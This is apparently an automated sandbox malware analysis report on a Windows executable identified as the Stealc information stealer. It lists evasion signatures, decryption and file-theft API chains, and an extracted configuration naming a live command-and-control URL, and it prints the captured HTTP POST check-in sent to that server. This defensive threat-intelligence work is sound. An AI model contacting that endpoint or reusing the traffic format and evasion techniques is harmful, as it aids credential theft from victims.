Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561849
MD5: 5ef73b409c0a81b7d80cce15a2e83ad9
SHA1: 6ddd5bf03db3c5402469a7f3f443f27f2566ba3b
SHA256: 005bb039d2c317340f5e0d3177d85559ccb63c3a722058833d824635069c4c4a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3012 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5EF73B409C0A81B7D80CCE15A2E83AD9)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 3012 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 3012 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T13:39:01.001087+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: file.exe.3012.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00304C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00316960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00316B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00307750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00313910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00311269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00311250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00314B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00314B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00312390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 32 38 34 38 44 46 41 39 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a
    Data Ascii (line breaks as in the raw bytes):
        ------GDBKJDGIJECFIEBFIDHC
        Content-Disposition: form-data; name="hwid"

        972848DFA9442409657292
        ------GDBKJDGIJECFIEBFIDHC
        Content-Disposition: form-data; name="build"

        mars
        ------GDBKJDGIJECFIEBFIDHC--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00304C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 32 38 34 38 44 46 41 39 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a
    Data Ascii (line breaks as in the raw bytes):
        ------GDBKJDGIJECFIEBFIDHC
        Content-Disposition: form-data; name="hwid"

        972848DFA9442409657292
        ------GDBKJDGIJECFIEBFIDHC
        Content-Disposition: form-data; name="build"

        mars
        ------GDBKJDGIJECFIEBFIDHC--
Source: file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php)
Source: file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003248B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059688A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032B100
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B69D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E5358
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C0BE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00619C53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00692CB8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00647D8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BD624
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006ECE1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032B71E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C2735
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B9FC6
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00304A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: jerbjqqv ZLIB complexity 0.9945139124773551
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00323A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\29SY8Y70.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
